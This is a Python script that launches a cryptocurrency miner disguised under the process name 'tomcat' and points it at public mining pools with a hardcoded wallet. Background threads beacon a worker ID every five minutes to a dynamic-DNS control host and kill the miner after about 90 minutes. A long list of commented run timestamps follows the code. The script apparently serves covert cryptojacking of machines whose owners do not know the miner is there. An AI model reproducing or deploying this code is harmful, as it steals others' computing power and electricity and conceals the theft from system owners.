import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:03.514475
#2018-02-17 16:51:03.862455
#2018-02-17 18:39:04.190667
#2018-02-17 20:26:06.424041
#2018-02-17 22:13:04.126285
#2018-02-17 23:57:04.119359
#2018-02-18 01:48:07.633196
#2018-02-18 03:36:04.529222
#2018-02-18 05:23:04.346347
#2018-02-18 07:14:07.868033
#2018-02-18 09:02:03.749472
#2018-02-18 10:49:07.287338
#2018-02-18 12:34:04.504939
#2018-02-18 14:21:07.297181
#2018-02-18 16:12:06.931396
#2018-02-18 18:00:08.137284
#2018-02-18 19:48:03.310151
#2018-02-18 21:33:06.589893
#2018-02-18 23:22:06.054368
#2018-02-19 01:09:06.761468
#2018-02-19 02:55:08.168748
#2018-02-19 04:42:08.437939
#2018-02-19 06:26:06.268727
#2018-02-19 08:16:06.385855
#2018-02-19 10:05:08.979471
#2018-02-19 11:54:06.475834
#2018-02-19 13:41:01.514677
#2018-02-19 15:28:09.292706
#2018-02-19 17:15:10.932820
#2018-02-19 19:03:06.714177
#2018-02-19 20:49:04.092801
#2018-02-19 22:38:01.539258
#2018-02-20 00:23:01.882585
#2018-02-20 02:11:05.754331
#2018-02-20 04:01:08.858040
#2018-02-20 05:44:07.946472
#2018-02-20 07:29:03.852483
#2018-02-20 09:14:01.302283
#2018-02-20 10:56:01.318455
#2018-02-20 12:45:08.735215
#2018-02-20 14:29:10.247420
#2018-02-20 16:13:09.981711
#2018-02-20 18:01:01.576747
#2018-02-20 19:53:05.418962
#2018-02-20 21:42:07.103123
#2018-02-20 23:24:05.621836
#2018-02-21 01:10:02.237017
#2018-02-21 02:57:07.652348
#2018-02-21 04:45:06.561591
#2018-02-21 06:34:05.529473
#2018-02-21 08:19:06.116114
#2018-02-21 10:05:10.804830
#2018-02-21 11:53:10.796548
#2018-02-21 13:44:11.119399
#2018-02-21 15:28:09.309401
#2018-02-21 17:18:07.347345
#2018-02-21 19:05:10.479238
#2018-02-21 20:53:01.412114
#2018-02-21 22:39:06.330025
#2018-02-22 00:27:07.554358
#2018-02-22 02:16:01.548447
#2018-02-22 04:02:01.828787
#2018-02-22 05:47:06.059022
#2018-02-22 07:33:05.993974
#2018-02-22 09:24:09.119224
#2018-02-22 11:10:09.338349
#2018-02-22 12:58:01.939038
#2018-02-22 14:46:09.354414
#2018-02-22 16:33:04.776695
#2018-02-22 18:19:01.437833
#2018-02-22 20:09:06.645157
#2018-02-22 21:57:06.456184
#2018-02-22 23:44:06.066943
#2018-02-23 01:33:01.417506
#2018-02-23 03:19:04.431281
#2018-02-23 05:05:04.157213
#2018-02-23 06:50:01.512096
#2018-02-23 08:40:05.826482
#2018-02-23 10:56:05.174225
#2018-02-23 12:52:08.900746
#2018-02-23 14:36:06.966178
#2018-02-23 16:26:06.220471
#2018-02-23 18:14:05.802690
#2018-02-23 19:59:06.136260
#2018-02-23 21:43:04.757343
#2018-02-23 23:36:07.735357
#2018-02-24 01:25:08.059494
#2018-02-24 03:15:03.191195
#2018-02-24 05:00:07.617746
#2018-02-24 06:49:06.294964
#2018-02-24 08:40:07.647513
#2018-02-24 10:24:06.317133
#2018-02-24 12:19:05.582162
#2018-02-24 14:12:07.102609
#2018-02-24 15:59:05.984980
#2018-02-24 17:53:06.498014
#2018-02-24 19:40:05.951455
#2018-02-24 21:27:02.014343
#2018-02-25 02:01:08.206047
#2018-02-25 05:56:01.499477
#2018-02-25 11:38:03.603654